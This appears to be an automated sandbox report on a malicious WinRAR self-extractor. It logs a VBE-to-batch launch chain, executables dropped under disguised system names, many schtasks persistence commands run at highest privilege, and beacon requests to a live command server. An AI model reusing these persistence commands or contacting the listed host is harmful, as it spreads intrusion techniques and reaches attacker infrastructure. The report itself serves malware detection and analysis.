            Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362800777.00000000030FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0702220.xsph.rux
            Source: MrsUvRPGeImAhc.exe, 00000010.00000002.325485482.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
            Source: chainsavesref.exe, 00000006.00000002.296875095.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru
            Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru/auth/login
            Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://index.from.sh/pages/game.html
            Source: unknownDNS traffic detected: queries for: a0702220.xsph.ru
            Source: global trafficHTTP traffic detected: GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0702220.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0702220.xsph.ru
            Source: cDouNOFXle.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile created: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeJump to behavior
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0006857B
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0008D00E
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0006407E
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_000770BF
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_00091194
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_00063281
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0006E2A0
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_000802F6
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_00076646
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0008070E
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0008473A
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_000737C1
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_000627E8
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0006E8A0
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_00084969
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0006F968
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_00073A3C
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_00076A7B
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_00080B43
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0008CB60
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_00075C77
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0006ED14
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_00073D6D
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0007FDFA
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0006BE13
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0006DE6C
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_00065F3C
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_00080F78
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: String function: 0007ED00 appears 31 times
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: String function: 0007E360 appears 52 times
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: String function: 0007E28C appears 35 times
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0006718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
            Source: cDouNOFXle.exe, 00000000.00000003.235684015.00000000054CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibcrypto$ vs cDouNOFXle.exe
            Source: cDouNOFXle.exe, 00000000.00000003.236067464.00000000054FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibcrypto$ vs cDouNOFXle.exe
            Source: cDouNOFXle.exe, 00000000.00000003.236847427.00000000054F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibcrypto$ vs cDouNOFXle.exe
            Source: cDouNOFXle.exeBinary or memory string: OriginalFilenamelibcrypto$ vs cDouNOFXle.exe
            Source: cDouNOFXle.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\cDouNOFXle.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\cDouNOFXle.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\cDouNOFXle.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\cDouNOFXle.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\cDouNOFXle.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
            Source: C:\Users\user\Desktop\cDouNOFXle.exeSection loaded: dxgidebug.dll
            Source: cDouNOFXle.exeVirustotal: Detection: 53%
            Source: cDouNOFXle.exeMetadefender: Detection: 40%
            Source: cDouNOFXle.exeReversingLabs: Detection: 60%
            Source: C:\Users\user\Desktop\cDouNOFXle.exeFile read: C:\Users\user\Desktop\cDouNOFXle.exeJump to behavior
            Source: cDouNOFXle.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\cDouNOFXle.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\cDouNOFXle.exe "C:\Users\user\Desktop\cDouNOFXle.exe"
            Source: C:\Users\user\Desktop\cDouNOFXle.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\comproviderRuntimecommon\chainsavesref.exe C:\comproviderRuntimecommon\chainsavesref.exe
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 9 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 11 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 6 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\winlogon.exe'" /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /f
            Source: unknownProcess created: C:\Recovery\explorer.exe C:\Recovery\explorer.exe
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Recovery\explorer.exe C:\Recovery\explorer.exe
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f
            Source: C:\Users\user\Desktop\cDouNOFXle.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\comproviderRuntimecommon\chainsavesref.exe C:\comproviderRuntimecommon\chainsavesref.exe
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\cDouNOFXle.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chainsavesref.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@34/22@1/1
            Source: C:\Users\user\Desktop\cDouNOFXle.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_00066EC9 GetLastError,FormatMessageW,
            Source: cDouNOFXle.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\comproviderRuntimecommon\chainsavesref.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Recovery\explorer.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Recovery\explorer.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_01
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeMutant created: \Sessions\1\BaseNamedObjects\Local\a662db5313495af89c12e9daf05e137fcad6fcec
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_00079E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCommand line argument: sfxname
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCommand line argument: sfxstime
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCommand line argument: STARTDLG
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" "
            Source: unknownProcess created: C:\Recovery\explorer.exe
            Source: unknownProcess created: C:\Recovery\explorer.exe
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: cDouNOFXle.exeStatic file information: File size 1232540 > 1048576
            Source: cDouNOFXle.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: cDouNOFXle.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: cDouNOFXle.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: cDouNOFXle.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: cDouNOFXle.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: cDouNOFXle.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: cDouNOFXle.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: cDouNOFXle.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: cDouNOFXle.exe
            Source: cDouNOFXle.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: cDouNOFXle.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: cDouNOFXle.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: cDouNOFXle.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: cDouNOFXle.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0007E28C push eax; ret
            Source: C:\Users\user\Desktop\cDouNOFXle.exeCode function: 0_2_0007ED46 push ecx; ret
            Source: cDouNOFXle.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\cDouNOFXle.exeFile created: C:\comproviderRuntimecommon\__tmp_rar_sfx_access_check_4065750Jump to behavior

            Persistence and Installation Behavior

            barindex
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comproviderRuntimecommon\chainsavesref.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: unknownExecutable created and started: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
            Source: unknownExecutable created and started: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile created: C:\Recovery\explorer.exeJump to dropped file
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile created: C:\Recovery\conhost.exeJump to dropped file
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile created: C:\comproviderRuntimecommon\RuntimeBroker.exeJump to dropped file
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile created: C:\comproviderRuntimecommon\backgroundTaskHost.exeJump to dropped file
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile created: C:\Recovery\winlogon.exeJump to dropped file
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile created: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeJump to dropped file
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile created: C:\Recovery\ShellExperienceHost.exeJump to dropped file
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile created: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeJump to dropped file
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile created: C:\Recovery\explorer.exeJump to dropped file
            Source: C:\Users\user\Desktop\cDouNOFXle.exeFile created: C:\comproviderRuntimecommon\chainsavesref.exeJump to dropped file
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile created: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exeJump to dropped file
            Source: C:\comproviderRuntimecommon\chainsavesref.exeFile created: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exeJump to dropped file

            Boot Survival

            barindex
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /f
            Source: C:\Users\user\Desktop\cDouNOFXle.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\comproviderRuntimecommon\chainsavesref.exeProcess information set: NOOPENFILEERRORBOX
